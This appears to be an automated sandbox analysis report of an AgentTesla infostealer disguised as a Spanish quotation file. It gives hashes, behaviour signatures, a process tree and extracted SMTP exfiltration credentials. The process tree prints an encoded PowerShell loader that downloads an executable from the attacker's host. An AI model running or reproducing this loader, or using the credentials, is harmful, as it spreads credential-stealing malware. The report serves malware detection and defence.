Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-08-2023 06:40

General

  • Target

    Especificación Cotización_DOC6467.exe

  • Size

    1.2MB

  • MD5

    39c65129bc2e871b8a7d09a31ceebb4b

  • SHA1

    022d2c610c09c1b76626f1f7a0fdc6f199f94ffe

  • SHA256

    0eb744ee1a95301432e7b9af6a3e4e67b18a02cb55baccf9c1a88b6aee906545

  • SHA512

    f64125f54ebd085c3d204a20f14422be764a179dd9dc2fb5da8c021256282ec032bc6291bcf7f43ccb6e2609d2db90ff354b5203b19d3e381167446a42584d55

  • SSDEEP

    24576:NTbBv5rUanfOOyeXEfqGOGleTM4WBGa6mXcqIAXiDFWmhHpa81yB:HBjf4rfqFVpLAXicQHg80

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mqils.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    +PT}MwwP2un&

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Executes dropped EXE 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Especificación Cotización_DOC6467.exe
    "C:\Users\Admin\AppData\Local\Temp\Especificación Cotización_DOC6467.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\rename.doc" /o ""
      2⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:4272
    • C:\Windows\SysWOW64\wscript.exe
      "C:\Windows\System32\wscript.exe" dbt-a.vbe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4456
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4116
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig /release
          4⤵
          • Gathers network information
          PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c aukxjbck.msc ilhgewl.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\aukxjbck.msc
          aukxjbck.msc ilhgewl.txt
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3260
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3924
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
              PID:3872
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 80
                6⤵
                • Program crash
                PID:3932
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ipconfig /renew
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4776
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /renew
            4⤵
            • Gathers network information
            PID:2688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -e ZgB1AG4AYwB0AGkAbwBuACAAYgA4ADEANQA4ADkAIAB7AHAAYQByAGEAbQAoACQAdwA0AGYAZQA1AGQAKQAkAGMAOQBmAGIAZQA1AD0AJwBoAGIANAAzAGUANAAnADsAJABhADgAMQAyADUAMwA9ACcAJwA7AGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAdwA0AGYAZQA1AGQALgBsAGUAbgBnAHQAaAA7ACQAaQArAD0AMgApAHsAJABrADYANQAzADQANwA4AD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJAB3ADQAZgBlADUAZAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAOwAkAGEAOAAxADIANQAzACsAPQBbAGMAaABhAHIAXQAoACQAawA2ADUAMwA0ADcAOAAgAC0AYgB4AG8AcgAgACQAYwA5AGYAYgBlADUAWwAoACQAaQAvADIAKQAlACQAYwA5AGYAYgBlADUALgBsAGUAbgBnAHQAaABdACkAOwB9AHIAZQB0AHUAcgBuACAAJABhADgAMQAyADUAMwA7AH0ADQAKACQAYgA3ADEANQAyADYAIAA9ACAAJwAxAGQAMQAxADUAZAA1AGQAMAAyADEANAAzAGIAMQBiADQANwA0ADcAMAAwADUAOQA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADYANgA0ADYAMABiADQAMAAwADEAMABmADUAMQAxAGQAMgBjADUAYQAxAGMAMAA3ADQANgA1AGMAMQA1ADYANwAwAGQAMQAwADQAMgA1AGEAMAA2ADUAMQAxAGIANQA5ADQAMQA0ADAAMABjADUAYQAwAGYANAAyADYANwA0AGEAMQA2ADQAMAAwAGQAMABmADEAYQA3ADcAMABjADUANQAwAGYAMABjADUAYgA0ADAAMQAxADUAZAAwAGIAMQAxADAAZgA0ADYAMQA2ADUAZAAwADYAMAA1ADEANAA2ADAAMQBjADQANwAxAGMAMAA3ADUAOQAxAGQAMgBjADcAYgA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADcAYQA1ADYAMQAxADAAZgA2ADUANgA4ADQANAA0ADYAMAA3ADUAOAAwADEAMAAxADEANAA1ADAAMAA5ADUANQAxAGIAMQAxADEANAA0ADMAMAA3ADUANQAwAGQAMAA0ADAAYwA0ADgAMwBlADcAMAAwADQAMABlADcAZAA1AGUAMQA1ADUAYgAxAGEAMQA2ADEAYwAxADEAMABlADUAMQAxAGEAMABjADUAMQA1AGYANQA2ADAANgA0AGEANABlADcAMQA1AGQAMQAxADQANgAxADEAMwAyADUAYgA1AGEAMABiADQAMAA1ADUANAAwADcAMwA1ADYAMQAxADYANAAxAGEAMABkADUANwA3ADIAMAAxADUAMAAxAGEAMAA3ADQANwA0ADAANAA3ADEAZAAzADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA1ADYAMQBkADQAMAAwAGQAMQAwADUAYQAxADMAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAMwAwAGUAMAAxADAAMQA1ADYANABkADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAMAAwADYANQAzADAANwAwAGEANABlADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA0ADkANQAwADAANwA1AGMAMAA0ADUANgAwAGIANABjADAAZgAzADMAMgA2ADUAOAA1AGYAMgBjADUAOQAxADgAMABkADQANgA0ADcANABkADEANgAwADMAMAA3ADQANgA1AGQAMAAwADUAOAA1AGIANQAwADEANgAxAGYAMgAwADUAYQAxAGMAMQAwADQAZAA2ADMAMABhADUAZAAwADYAMQA2ADAAOQAxADEAMgA5ADUAYgAwADkAMAA2ADcAOAA1AGEAMAA3ADQANgAwADkAMQAwADQAZAAxADEANABjADYAOQAxADgAMQA3ADUANgA1AGYAMABjADUANwA0ADgAMQAxADQAMAA1ADIAMQAxADUAZAAwAGIANAAyADUAMQA0AGIAMQAxADUAMQAxAGEAMABjADEANAA3AGEAMABiADQAMAAzADgAMQA2ADQANgAxADMAMQA2ADAAMwA1ADEAMAA2ADUAMgAwADEANABkADQANwAxAGMAMQAwADUAZAA1AGQAMAAyADEANAAxADAANQA3ADAANwAwAGIANQBjADEAZAA1ADMAMwA5ADcAMAA1AGYAMAA5ADcAZAAwADUAMQAyADUAYgA0ADEAMQAxADEAYwA0AGEAMAA5ADUAMQA0ADEAMABiADUAMQAwADQANQAxADAANgAxADEANAA5ADcAMQAwADYAMQA2ADQANgA0AGEAMwA1ADUAYgAwADEAMABjADQAMAAwAGUANAA3ADYAMgAwADEAMQAwADQAMAA0ADYAMAA0ADUAOAAzADgAMQAwADUAYgA0ADcAMAAwADUANwAxAGMANAAwADEAZAA2AGUAMQA1ADQAMQAwAGEAMABlADUAZAA1ADAANAA1ADQANwAxAGMAMAAzADQAMAA1AGEAMAA2ADEANAAwAGQAMQBhADQAMAA1ADYAMQA3ADUAYQA0ADgAMAAwADUAYgA1AGMAMAA5ADEANAAwADQANQA0ADAAMAAwADUANQAyADUAMgA0ADAAMgBiADUAYQA0ADcAMwA1ADQAMAAxAGEANAAyADUAZQA1ADIANQA2ADUANgA1AGIANQA2ADUAMAAxAGYAMwAwADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAZAA1ADAANQAxADUANwA0ADQAMQA3ADUAZAA1AGQAMQAxADEANAAwAGIANQBiADUAMQA1ADcANQAyADAANwAwAGIANABlADUAYgA0ADYAMQAxADEANAAxAGQAMABiADUAYQA0ADcANAA1ADUAZgAwADkANQAzADAAZAA1ADcANQA2ADEAZAA1ADMAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA0ADUAMABhADUAZAAwAGMANAAyADUAYwAwADUANQBkADAAMgA1ADkAMAAxADUANQAxAGIANABjADQAZgAxAGMAMQAwADQAZAA0ADgAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAZAA1AGIANQA3ADAAMQA1ADEAMAA0ADAAOQAxAGIANQA1ADAAZAA1ADcAMAAzADAANgA0ADAAMAAwADAAYwAwADIANQAwADAAYwA1ADEANABhADEANgAwADMANQBjADAANAAwAGUANQA2ADAAMwAwADYAMAA0ADAAMAAwAGEANQA3ADAANAAwADMANQAxADAANAAwAGQANAAwADEAZAAxAGEANQBlADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANQBmADQAMwA1ADUAMAA2ADAAMQAwAGQANABhADQAZAAwADAANQAwADAAMQAwAGEAMAAzADEAOAA1ADEANQBkADAANQA1AGQANQBhADAAZAAxAGIANAA3ADAANgA1ADEANQAyADUAMgAwADcANQAyADAAMQAwADkANQAxADAAMgAwADYANQAyADAANAA1ADEANQAyADUANwAwADQANQAzADAAMAA1AGUANQAyADAANwAwADYANQA3ADAANAAwAGMANQAzADAANAAxADEANABjADEAZAA1ADMAMAAwADQAZAA0ADcAMAAwADYAZgAzADUANAAyADQANAAxADMANQA4ADEANAAxADMANQAyADQAYwA3ADEANQBkADEAOAA1ADgAMQBhADAAMQAwADQANAA5ADAANAAxADAANQAyADAANAAxAGYANQA1ADQAYwA1ADgANQA1ADEAOAAwADMAMQBkADAAYwA1ADgANABlADAANAA0AGIAMgA2ADAANwA0ADgAMQBmADAAZgA0ADYAMABjADUAYQAxAGMANAAyADUAYgAwAGEAMAAxADAANQA1ADAANQAzADAAOQAwADMANQBlADUAOAA1AGUANQA2ADAAMgAwADQAMAAzADEAYwAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANABlADEAYwA2ADYAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANABjADQANAA0ADYAMgBlADUAMQA1AGQAMAAyADQAMAAwADAANABlADAANAA0AGIANQAxADAANAA0ADQAMABkADQAMQA0ADcANAA1ADUAYgA1ADEAMAA2ADAANQAwAGIANQA0ADEAZAA1ADMAMgBmADUANQA0ADEAMQA2ADUAYwAwADkAMABlADEAYQA3ADAAMABhADQANAAxADEANABhADQANAAxAGYANQA1ADEAOAAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANABlADQANAAxAGQAMgA5ADUAMQAwADYAMAA1ADQAMAA1AGIANABjADAAZgAwADQANQA0ADAAMAAwADUANQAyADUAMgA0ADAAMAAzADAAMQAwADAANQBjADAAMwA1AGEAMAAwADEAOAAxAGIAMwAwADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEAZAAxADgANABjADcAOAA1ADYAMABiADUAMwAxAGMAMABhADEAOAA1AGMANQBjADUAMAA1ADkANQBhADAANQAxAGYAMABhADQAMQAxAGMANAAyADUAYgAwAGEAMAAxADAANQA1ADAANQAzADEAZAAwADgAMQA4ADUANwAwADkAMQA2ADUANwA1AGIAMQBlADQAOQAxADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA0ADUAMABhADUAZAAwAGMANAAyADUAYQAwAGIAMAA2ADAAMQA1ADEANQA0ADUANwAxAGIANABjADQAZgAzADgAMQAwADUAYgA1ADAAMAAwADQANwAxAGIAMwAxADQAMAA1ADIAMQA3ADQAMAAyADEAMABjADUAMgA1AGMANAA1ADUAZQA1AGIAMAA0ADAAYwA1ADYAMAA2ADAANgA1ADUAMABjADUAMQA0ADQANAA1ADYANAAxAGEAMABkADUANwA1ADYAMQA2ADQANwAzAGIAMQA2ADUANQA0ADEAMQAxADcAZAAwADYAMAA0ADUAYgAxAGIAMgAwADUAYQAxAGUAMABiADQANgA1AGMAMABiADUAOQAwAGQAMABjADQAMAAxAGQAMgAyADUAMQAxAGMAMgA0ADUAYgA1AGYAMAAxADUAMQAxAGEAMwAyADUANQA0ADcAMABkADEAYwAyAGQAMABjADQAMgA1AGEAMQA3ADUAYgAwADYAMABmADUAMQA1AGQAMQAxADEAYQAzAGIAMQAyADUAMQA1ADAAMABjADUANQAwADQAMgA0ADUAYgA1AGYAMAAxADUAMQAxAGEANABjADcANQA0ADMAMQA1ADUAOAAwADEAMAAxADUANQA0ADcAMABjADUAYgAwADYAMgA2ADUANQA0ADcAMAA0ADEAZAA0ADgANAA5ADEANAAxADEAMwA5ADYAOAAwADcANQBhADAAYwA1ADYANQBjADEAYQAwAGQAMQBhADUAMQAxADEANABjADAAZgAzADgAMQAwADUAYgA1ADAAMAAwADQANwAxAGIANABjADYANwA0ADcAMAA0ADQANgAxAGMANABhADUAZQAwADAAMAAzADAAYwAwAGQAMAAxADAANgAxAGEANQBlADQAOQAxADgAMQA3ADUANgA1AGYAMABjADUANwA0ADgAMQAxADQAMAA1ADIAMQAxADUAZAAwAGIANAAyADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA1ADEANQBkADAANQA1AGQANQBhADAAZAAxAGIAMQA2ADQAMAAxAGEAMABiADUAYQA1ADQANAA1ADUAMwAwAGIAMAAzADUANgA1ADYANQBjADAAMwA0ADEAMQA5ADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA1AGIANQA3ADAAMAA1AGQANQA0ADAANwA1ADEANQA4ADEANgAwADAAMAAwADAAMAAwADAAMAAwADAAMAA0AGEANQA5ADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA0ADAANQAyADAAZAAwAGMAMAA0ADAANgAwAGUAMwA2ADQAMAAxAGEAMABiADUAYQA1ADQANABiADcAMQAwADUAMQAyADQAMAA0AGEANQBlADUAMgAwADcAMQAwADEAYwA1AGEAMABiADQAMAA0ADgAMABiADAAOQAwADMANQBlADUAZAA1ADQAMAA1ADUANwA1ADIAMAA3ADUAMQA1ADEANQA1ADEAYQA3AGYAMAAwADUAYQAwAGYAMQA2ADUAYwAwADgAMABjADEAZgA1ADUANQAwADEAZAA0ADgAMAA3ADQAZAAxAGMAMAA3ADEANAA0AGIANQAwADAANwA1ADAANQBiADAAOQA3ADAAMABhADUAYQAxAGUAMAA3ADQANgA0ADcANABiADYAMAAwADcAMgAwADQAZAA0ADcAMAAwADEAYwAwAGYAMAAxADUANQA1ADEAMAAwADAAZAA1AGYANABjADYANwA0ADYAMAA3ADQANwAxAGMAMQAwADUAZAA1AGQAMAAyADEAYwAwADEANABlADAANgAxAGEANAA5ADAANQA1AGUANABiADAAZgA0ADAANQAyADAAZAAwAGMAMAA0ADAANgAxADgANQA4ADEAYwAwAGIAMABhADUANQA0ADEANABjADEAYwAxADAANQA3ADAANwAwAGIANQBjADYAYQAwADAANQAwADAAMAAwADYANQAzADAANwAwAGEAMwA5ADEAYwA1AGEANABhADAANgA0ADEANAA3ADUAYwAwADEANQAxADAAMQA1AGUANQAxADUANgAxAGQAMgA5ADUAMQAwADYAMAA1ADQAMAA1AGIAMwA4ADEAZAA1ADMAMQBmADQANgA1ADYAMQAxADQAMQAxAGEAMABjADEANAA0ADAANQAyADAAZAAwAGMAMAA0ADAANgAwADgAMQA4ADQAOQAnADsADQAKACQAYgA3ADEANQAyADYAMgAgAD0AIABiADgAMQA1ADgAOQAoACQAYgA3ADEANQAyADYAKQA7AA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYgA3ADEANQAyADYAMgA7AA0ACgBbAHAAYgBhAGUAZgA4AF0AOgA6AGgANgA4ADYAMQBjAGEAKAApADsADQAKAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBtAHEAaQBsAHMALgBjAG8AbQAvAG8AcgBpAGcAaQBuAGEAbAAvAG0AaQBrAGUALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG8AOAA4AGUAOQAuAGUAeABlACIAOwANAAoAWwBwAGIAYQBlAGYAOABdADoAOgBuADgAYwA1ADkANgBjACgAKQA7AA==
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -e ZgB1AG4AYwB0AGkAbwBuACAAYgA4ADEANQA4ADkAIAB7AHAAYQByAGEAbQAoACQAdwA0AGYAZQA1AGQAKQAkAGMAOQBmAGIAZQA1AD0AJwBoAGIANAAzAGUANAAnADsAJABhADgAMQAyADUAMwA9ACcAJwA7AGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAdwA0AGYAZQA1AGQALgBsAGUAbgBnAHQAaAA7ACQAaQArAD0AMgApAHsAJABrADYANQAzADQANwA4AD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJAB3ADQAZgBlADUAZAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAOwAkAGEAOAAxADIANQAzACsAPQBbAGMAaABhAHIAXQAoACQAawA2ADUAMwA0ADcAOAAgAC0AYgB4AG8AcgAgACQAYwA5AGYAYgBlADUAWwAoACQAaQAvADIAKQAlACQAYwA5AGYAYgBlADUALgBsAGUAbgBnAHQAaABdACkAOwB9AHIAZQB0AHUAcgBuACAAJABhADgAMQAyADUAMwA7AH0ADQAKACQAYgA3ADEANQAyADYAIAA9ACAAJwAxAGQAMQAxADUAZAA1AGQAMAAyADEANAAzAGIAMQBiADQANwA0ADcAMAAwADUAOQA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADYANgA0ADYAMABiADQAMAAwADEAMABmADUAMQAxAGQAMgBjADUAYQAxAGMAMAA3ADQANgA1AGMAMQA1ADYANwAwAGQAMQAwADQAMgA1AGEAMAA2ADUAMQAxAGIANQA5ADQAMQA0ADAAMABjADUAYQAwAGYANAAyADYANwA0AGEAMQA2ADQAMAAwAGQAMABmADEAYQA3ADcAMABjADUANQAwAGYAMABjADUAYgA0ADAAMQAxADUAZAAwAGIAMQAxADAAZgA0ADYAMQA2ADUAZAAwADYAMAA1ADEANAA2ADAAMQBjADQANwAxAGMAMAA3ADUAOQAxAGQAMgBjADcAYgA1ADMAMQA3ADQANwA1AGEAMABiADUAMwA0ADgAMwAxADQAZAA0ADAAMQAxADUAMQAwADUANABjADcAYQA1ADYAMQAxADAAZgA2ADUANgA4ADQANAA0ADYAMAA3ADUAOAAwADEAMAAxADEANAA1ADAAMAA5ADUANQAxAGIAMQAxADEANAA0ADMAMAA3ADUANQAwAGQAMAA0ADAAYwA0ADgAMwBlADcAMAAwADQAMABlADcAZAA1AGUAMQA1ADUAYgAxAGEAMQA2ADEAYwAxADEAMABlADUAMQAxAGEAMABjADUAMQA1AGYANQA2ADAANgA0AGEANABlADcAMQA1AGQAMQAxADQANgAxADEAMwAyADUAYgA1AGEAMABiADQAMAA1ADUANAAwADcAMwA1ADYAMQAxADYANAAxAGEAMABkADUANwA3ADIAMAAxADUAMAAxAGEAMAA3ADQANwA0ADAANAA3ADEAZAAzADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA1ADYAMQBkADQAMAAwAGQAMQAwADUAYQAxADMAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAMwAwAGUAMAAxADAAMQA1ADYANABkADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAMAAwADYANQAzADAANwAwAGEANABlADQANwA0ADcAMQA3ADUAZAAwADYAMAA1ADEANAA0ADkANQAwADAANwA1AGMAMAA0ADUANgAwAGIANABjADAAZgAzADMAMgA2ADUAOAA1AGYAMgBjADUAOQAxADgAMABkADQANgA0ADcANABkADEANgAwADMAMAA3ADQANgA1AGQAMAAwADUAOAA1AGIANQAwADEANgAxAGYAMgAwADUAYQAxAGMAMQAwADQAZAA2ADMAMABhADUAZAAwADYAMQA2ADAAOQAxADEAMgA5ADUAYgAwADkAMAA2ADcAOAA1AGEAMAA3ADQANgAwADkAMQAwADQAZAAxADEANABjADYAOQAxADgAMQA3ADUANgA1AGYAMABjADUANwA0ADgAMQAxADQAMAA1ADIAMQAxADUAZAAwAGIANAAyADUAMQA0AGIAMQAxADUAMQAxAGEAMABjADEANAA3AGEAMABiADQAMAAzADgAMQA2ADQANgAxADMAMQA2ADAAMwA1ADEAMAA2ADUAMgAwADEANABkADQANwAxAGMAMQAwADUAZAA1AGQAMAAyADEANAAxADAANQA3ADAANwAwAGIANQBjADEAZAA1ADMAMwA5ADcAMAA1AGYAMAA5ADcAZAAwADUAMQAyADUAYgA0ADEAMQAxADEAYwA0AGEAMAA5ADUAMQA0ADEAMABiADUAMQAwADQANQAxADAANgAxADEANAA5ADcAMQAwADYAMQA2ADQANgA0AGEAMwA1ADUAYgAwADEAMABjADQAMAAwAGUANAA3ADYAMgAwADEAMQAwADQAMAA0ADYAMAA0ADUAOAAzADgAMQAwADUAYgA0ADcAMAAwADUANwAxAGMANAAwADEAZAA2AGUAMQA1ADQAMQAwAGEAMABlADUAZAA1ADAANAA1ADQANwAxAGMAMAAzADQAMAA1AGEAMAA2ADEANAAwAGQAMQBhADQAMAA1ADYAMQA3ADUAYQA0ADgAMAAwADUAYgA1AGMAMAA5ADEANAAwADQANQA0ADAAMAAwADUANQAyADUAMgA0ADAAMgBiADUAYQA0ADcAMwA1ADQAMAAxAGEANAAyADUAZQA1ADIANQA2ADUANgA1AGIANQA2ADUAMAAxAGYAMwAwADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADAANQAwADAAZAA1ADAANQAxADUANwA0ADQAMQA3ADUAZAA1AGQAMQAxADEANAAwAGIANQBiADUAMQA1ADcANQAyADAANwAwAGIANABlADUAYgA0ADYAMQAxADEANAAxAGQAMABiADUAYQA0ADcANAA1ADUAZgAwADkANQAzADAAZAA1ADcANQA2ADEAZAA1ADMAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA0ADUAMABhADUAZAAwAGMANAAyADUAYwAwADUANQBkADAAMgA1ADkAMAAxADUANQAxAGIANABjADQAZgAxAGMAMQAwADQAZAA0ADgAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANAA1ADQAZAA1AGIANQA3ADAAMQA1ADEAMAA0ADAAOQAxAGIANQA1ADAAZAA1ADcAMAAzADAANgA0ADAAMAAwADAAYwAwADIANQAwADAAYwA1ADEANABhADEANgAwADMANQBjADAANAAwAGUANQA2ADAAMwAwADYAMAA0ADAAMAAwAGEANQA3ADAANAAwADMANQAxADAANAAwAGQANAAwADEAZAAxAGEANQBlADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEANAAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANQBmADQAMwA1ADUAMAA2ADAAMQAwAGQANABhADQAZAAwADAANQAwADAAMQAwAGEAMAAzADEAOAA1ADEANQBkADAANQA1AGQANQBhADAAZAAxAGIANAA3ADAANgA1ADEANQAyADUAMgAwADcANQAyADAAMQAwADkANQAxADAAMgAwADYANQAyADAANAA1ADEANQAyADUANwAwADQANQAzADAAMAA1AGUANQAyADAANwAwADYANQA3ADAANAAwAGMANQAzADAANAAxADEANABjADEAZAA1ADMAMAAwADQAZAA0ADcAMAAwADYAZgAzADUANAAyADQANAAxADMANQA4ADEANAAxADMANQAyADQAYwA3ADEANQBkADEAOAA1ADgAMQBhADAAMQAwADQANAA5ADAANAAxADAANQAyADAANAAxAGYANQA1ADQAYwA1ADgANQA1ADEAOAAwADMAMQBkADAAYwA1ADgANABlADAANAA0AGIAMgA2ADAANwA0ADgAMQBmADAAZgA0ADYAMABjADUAYQAxAGMANAAyADUAYgAwAGEAMAAxADAANQA1ADAANQAzADAAOQAwADMANQBlADUAOAA1AGUANQA2ADAAMgAwADQAMAAzADEAYwAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANABlADEAYwA2ADYAMgBjADUAYQAxAGMAMwAyADQAMAA0ADEANABjADQANAA0ADYAMgBlADUAMQA1AGQAMAAyADQAMAAwADAANABlADAANAA0AGIANQAxADAANAA0ADQAMABkADQAMQA0ADcANAA1ADUAYgA1ADEAMAA2ADAANQAwAGIANQA0ADEAZAA1ADMAMgBmADUANQA0ADEAMQA2ADUAYwAwADkAMABlADEAYQA3ADAAMABhADQANAAxADEANABhADQANAAxAGYANQA1ADEAOAAwADkANQA3ADAANwAwAGEANQAyADAANgAwAGEANABlADQANAAxAGQAMgA5ADUAMQAwADYAMAA1ADQAMAA1AGIANABjADAAZgAwADQANQA0ADAAMAAwADUANQAyADUAMgA0ADAAMAAzADAAMQAwADAANQBjADAAMwA1AGEAMAAwADEAOAAxAGIAMwAwADcAZAAwADYAMQA2ADYANAA0ADcAMQA3ADEAZAAxADgANABjADcAOAA1ADYAMABiADUAMwAxAGMAMABhADEAOAA1AGMANQBjADUAMAA1ADkANQBhADAANQAxAGYAMABhADQAMQAxAGMANAAyADUAYgAwAGEAMAAxADAANQA1ADAANQAzADEAZAAwADgAMQA4ADUANwAwADkAMQA2ADUANwA1AGIAMQBlADQAOQAxADUAMQAyADQAMQA1ADEAMAA5ADUAZAAwAGIANAAyADQANwA0ADcAMAA0ADQAMAAwADEAMAAxADEANAA0ADUAMABhADUAZAAwAGMANAAyADUAYQAwAGIAMAA2ADAAMQA1ADEANQA0ADUANwAxAGIANABjADQAZgAzADgAMQAwADUAYgA1ADAAMAAwADQANwAxAGIAMwAxADQAMAA1ADIAMQA3ADQAMAAyADEAMABjADUAMgA1AGMANAA1ADUAZQA1AGIAMAA0ADAAYwA1ADYAMAA2ADAANgA1ADUAMABjADUAMQA0ADQANAA1ADYANAAxAGEAMABkADUANwA1ADYAMQA2ADQANwAzAGIAMQA2ADUANQA0ADEAMQAxADcAZAAwADYAMAA0ADUAYgAxAGIAMgAwADUAYQAxAGUAMABiADQANgA1AGMAMABiADUAOQAwAGQAMABjADQAMAAxAGQAMgAyADUAMQAxAGMAMgA0ADUAYgA1AGYAMAAxADUAMQAxAGEAMwAyADUANQA0ADcAMABkADEAYwAyAGQAMABjADQAMgA1AGEAMQA3ADUAYgAwADYAMABmADUAMQA1AGQAMQAxADEAYQAzAGIAMQAyADUAMQA1ADAAMABjADUANQAwADQAMgA0ADUAYgA1AGYAMAAxADUAMQAxAGEANABjADcANQA0ADMAMQA1ADUAOAAwADEAMAAxADUANQA0ADcAMABjADUAYgAwADYAMgA2ADUANQA0ADcAMAA0ADEAZAA0ADgANAA5ADEANAAxADEAMwA5ADYAOAAwADcANQBhADAAYwA1ADYANQBjADEAYQAwAGQAMQBhADUAM